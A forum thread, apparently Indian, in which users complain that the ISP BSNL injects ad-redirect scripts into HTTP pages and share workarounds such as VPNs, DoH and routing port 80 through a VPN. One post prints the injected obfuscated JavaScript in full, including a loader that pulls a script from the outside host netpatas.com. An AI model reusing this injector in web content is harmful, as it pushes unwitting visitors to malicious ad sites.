BSNL is inserting ads in websites, sending their users to malware sites through malware code injection

[NikhilS]

Make a new thread please? ^^

 

[Nishant]

@Nishant Hi! - How are you doing the load balancing between service providers? What equipment is involved? Thanks

I am using an Edgerouter X for this.

 

[yuvraj]

Hi, This issue is still happening, I did not know that it is caused by ISP until I read this forum. I also observed that it not just related to all http request, It just happens on some specific sites. They insert a javascript file within your page which then cause the redirection to ads of click events.

Here is what they are using:

!function() {
var a = "/js/jquery-3.2.1.min.js"
, r = null
, e = document.getElementsByTagName("script")
, i = e.length
, n = null
, t = Date.now()
, s = null
, o = 0;
for ("/" === a.substring(0, 1) && (a = a.substring(1)),
o = 0; o < i; o += 1)
if (void 0 !== e[o].src && null !== e[o].src && e[o].src.indexOf(a) > -1) {
n = o,
r = e[o];
break
}
void 0 !== r && null !== r || (r = document.getElementsByTagName("script")[0]),
s = r.src.indexOf("?") > -1 ? r.src + "&cb=" + t.toString() + "&fingerprint=c2VwLW5vLXJlZGlyZWN0&onIframeFlag" : r.src + "?cb=" + t.toString() + "&fingerprint=c2VwLW5vLXJlZGlyZWN0&onIframeFlag";
try {
if (void 0 === window.sarazasarazaNoti || null === window.sarazasarazaNoti || window.sarazasarazaNoti === Array && window.sarazasarazaNoti.indexOf(r.src) < 0) {
void 0 !== window.sarazasarazaNoti && null !== window.sarazasarazaNoti || (window.sarazasarazaNoti = new Array),
window.sarazasarazaNoti.push(r.src);
var c = r.parentNode
, d = r;
if (r.async || r.defer || null !== n && n !== e.length - 1) {
var w = document.createElement("script");
w.src = s,
c.replaceChild(w, d)
} else
document.write("<script type='text/javascript' src=" + s + "><\/script>"),
c.removeChild(d)
}
} catch (a) {}
}();
document.addEventListener('DOMContentLoaded', function() {
var esp = document.createElement('span');
var esr = document.createElement('script');
esr.src = 'http://netpatas.com/apu.php?zoneid=1812939&ndn=m2';
esr.type = 'text/javascript';
esp.appendChild(esr);
document.body.appendChild(esp);
}, false);

I tried accessing other random site with http and I did not see this problem there. So, I want to be sure that this is not happening because hosted server is compromised. Do they have specific sites in there list to attack this way?

If they are targeting specific site let say Example Domain, does that mean if I access example.com from any other BSNL connection. I will still ads on this site?

I want to stop this completely what action I should take? Please guide.

 

[S2B]

Any resolution on this issue from you all here? BSNL is non-responsive on this topic. The problem feels more acute offlate where every other click is popping up a new adware tab for me on http sites.

Any recommendations please to avoid this?

 

[pothi]

Every recommendation comes with a disadvantage. For me, an always-on free VPN (proton or cloud flare) worked. VPN slows down the overall browsing experience considerably.

 

[JB701]

I don't think this is possible on OpenVPN itself but if you have a router level VPN, you can pass only port 80 through VPN and have rest of the ports like 443 go over normally. I haven't tried it myself and I don't know if it'll create issues though.

This'll only work if a web server/website has http hosted on port 80 (most sites do but some may not).

 

---

[shashankb]

Deleted

 

[pothi]

Got back to using BSNL after 3 or 4 months. Upgraded my Mikrotik router firmware to the latest version that supports DoH. Enabling it resolved the script injection. However, BSNL still shows its own ads such as payment reminders when using http. No other scary popups, though.

 

[JB701]

@pothi Since you have Mikrotik, what you can do to completely get rid of http injection is to:

1. Setup a PPTP VPN on router

2. Create a mangle rule with a specific routing mark with dst port 80

3. Route that routing mark through VPN

Idk if BSNL does injections on port 80 or http in general though but this does seem to work and https is completely uninterrupted.

mtr 1.1.1.1 (ICMP, without mangle rule)

 Host                                                                        Loss%   Snt   Last   Avg  Best  Wrst StDev
1. DESKTOP-L8K59D2.mshome.net                                                0.0%     6    0.2   0.5   0.2   0.7   0.2
2. 192.168.5.1                                                               0.0%     6    1.9   1.8   1.7   2.0   0.1
3. dhcp.tripleplay.in                                                        0.0%     6   33.2   8.6   2.7  33.2  12.1
4. 103.240.232.113                                                          66.7%     6    4.3   7.8   4.3  11.3   4.9
5. core-router.static.tripleplay.in                                          0.0%     5    7.6   4.5   3.1   7.6   1.9
6. nsg-static-073.92.72.182.airtel.in                                        0.0%     5    3.6   7.5   3.6  16.3   5.1
7. 116.119.49.159                                                            0.0%     5   26.9   9.2   4.0  26.9   9.9
8. 182.79.161.213                                                            0.0%     5    4.8   4.6   3.8   5.5   0.6
9. 1.1.1.1                                                                   0.0%     5    4.7   4.3   3.8   4.7   0.4

mtr -P 80 -T 1.1.1.1 (without mangle rule)

 Host                                                                        Loss%   Snt   Last   Avg  Best  Wrst StDev
1. DESKTOP-L8K59D2.mshome.net                                                0.0%    10    0.8   0.7   0.4   0.8   0.1
2. 192.168.5.1                                                               0.0%    10    1.9   2.2   1.2   4.1   0.8
3. (waiting for reply)
4. (waiting for reply)
5. 103.240.232.42                                                            0.0%     9    2.5   3.3   2.5   5.5   0.9
6. (waiting for reply)
7. (waiting for reply)
8. (waiting for reply)
9. (waiting for reply)
10. 182.79.161.213                                                            0.0%     9    4.6   5.2   3.8  12.1   2.6
11. one.one.one.one                                                           0.0%     9    4.7 117.3   4.1 1011. 335.4

mtr 1.1.1.1 (ICMP, with mangle rule enabled for port 80)

 Host                                                                        Loss%   Snt   Last   Avg  Best  Wrst StDev
1. DESKTOP-L8K59D2.mshome.net                                                0.0%     3    0.4   0.5   0.4   0.6   0.1
2. 192.168.5.1                                                               0.0%     3    1.1   2.2   1.1   3.1   1.0
3. dhcp.tripleplay.in                                                        0.0%     3   51.9  44.8   6.4  75.9  35.3
4. (waiting for reply)
5. core-router.static.tripleplay.in                                          0.0%     3    3.6  15.1   3.6  23.6  10.3
6. nsg-static-073.92.72.182.airtel.in                                        0.0%     3    4.3   4.3   4.3   4.4   0.1
7. 116.119.49.159                                                            0.0%     3    5.4   5.1   5.0   5.4   0.2
8. 182.79.161.213                                                            0.0%     3    3.7   3.6   3.3   3.7   0.2
9. 1.1.1.1                                                                   0.0%     3    5.4   4.5   3.9   5.4   0.8

mtr -P 80 -T 1.1.1.1 (with mangle rule enabled):

 Host                                                                        Loss%   Snt   Last   Avg  Best  Wrst StDev
1. DESKTOP-L8K59D2.mshome.net                                                0.0%     8    0.8   0.7   0.3   0.9   0.2
2. 192.168.5.1                                                               0.0%     8    3.2   1.7   1.0   3.2   0.8
3. 10.1.1.1                                                                  0.0%     8   86.2  80.8  74.8  86.2   4.0
4. (waiting for reply)
5. (waiting for reply)
6. (waiting for reply)
7. (waiting for reply)
8. (waiting for reply)
9. (waiting for reply)
10. (waiting for reply)
11. one.one.one.one                                                           0.0%     7   90.1  83.2  76.7  90.1   4.8

Update:

For PFSense you can do it even easier:
1. Setup OpenVPN Client VPN on your browser. You can use any VPN Provider which provides OpenVPN such as Nord,PIA, ExpressVPN, Mullvad, Surfshark. Make sure you have the NAT Rules setup as well.
2. Add a firewall rule at Firewall>Rules>LAN
3. Mask sure that
Protocol : TCP
Source: LAN Net
Destination Port Range: HTTP (80)
4. Click on "Show Advanced"
5. Scroll down to "Gateway"
6. Set the gateway to your VPN
7. Click on Save button at bottom and then on "Apply Changes"
Now all your unencrypted http traffic will go over the VPN

 

[zerosleeping]

I took this issue up with the local BSNL NOC guys in my town before the re-lockdown.

The guy claimed helplessness and asked me to send a mail to him detailing the sites that
were a part of the redirect in http usage. Needless to say I didn't send them any mail
and ended up surrendering the broadband connection while retaining the landline number.
Moved over to the cheapest plan for 129/- per month.

Switched over to a local 50 MBPS FTTH connection. Should have ditched them a long time ago.